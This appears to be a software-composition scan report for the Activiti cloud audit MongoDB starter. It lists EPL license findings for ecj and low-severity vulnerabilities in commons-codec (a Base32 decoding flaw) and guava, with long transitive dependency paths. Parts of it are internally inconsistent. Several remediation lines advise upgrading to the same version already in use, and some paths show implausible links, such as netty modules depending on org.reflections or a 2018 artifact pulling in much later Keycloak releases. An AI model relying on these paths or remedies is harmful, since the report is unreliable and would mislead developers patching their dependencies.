Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10 › junit:junit@4.13.2
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10 › jmock:jmock@1.0.1 › junit:junit@4.13.2
EPL-1.0 license
medium severity
- Module: org.eclipse.jdt.core.compiler:ecj
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › com.querydsl:querydsl-apt@4.1.4 › com.querydsl:querydsl-codegen@4.1.4 › com.mysema.codegen:codegen@0.6.8 › org.eclipse.jdt.core.compiler:ecj@4.3.1
EPL-1.0 license
low severity
- Vulnerable module: commons-codec:commons-codec
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-spring-security-adapter@25.0.3 › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-spring-security-adapter@25.0.3 › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-spring-security-adapter@25.0.3 › org.keycloak:keycloak-policy-enforcer@25.0.3 › org.keycloak:keycloak-authz-client@25.0.3 › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-spring-security-adapter@25.0.3 › org.keycloak:keycloak-policy-enforcer@25.0.3 › org.keycloak:keycloak-authz-client@25.0.3 › org.apache.httpcomponents:httpclient@4.5.14 › commons-codec:commons-codec@1.11
Overview
commons-codec:commons-codec is a package that contains simple encoder and decoders for various formats such as Base64 and Hexadecimal.
Affected versions of this package are vulnerable to Information Exposure. When there is no byte array value that can be encoded into a string the Base32 implementation does not reject it, and instead decodes it into an arbitrary value which can be re-encoded again using the same implementation. This allows for information exposure exploits such as tunneling additional information via seemingly valid base 32 strings.
Remediation
Upgrade commons-codec:commons-codec to version 1.14 or higher.
References
low severity
- Vulnerable module: com.google.guava:guava
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-spring-web@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-spring-web@2.8.0 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger-ui@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-spring-web@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-schema@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger-ui@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger-ui@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-schema@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-schema@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › com.querydsl:querydsl-apt@4.1.4 › com.querydsl:querydsl-codegen@4.1.4 › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › com.querydsl:querydsl-apt@4.1.4 › com.querydsl:querydsl-codegen@4.1.4 › com.mysema.codegen:codegen@0.6.8 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.netflix-commons:netflix-infix@0.3.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.servo:servo-core@0.5.3 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-spring-web@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › io.springfox:springfox-swagger2@2.8.0 › io.springfox:springfox-swagger-common@2.8.0 › io.springfox:springfox-schema@2.8.0 › io.springfox:springfox-spi@2.8.0 › io.springfox:springfox-core@2.8.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.netflix-commons:netflix-infix@0.3.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.netflix-commons:netflix-infix@0.3.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.servo:servo-core@0.5.3 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.servo:servo-core@0.5.3 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.netflix-commons:netflix-infix@0.3.0 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.netflix.netflix-commons:netflix-eventbus@0.3.0 › com.netflix.servo:servo-core@0.5.3 › com.google.guava:guava@20.0
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
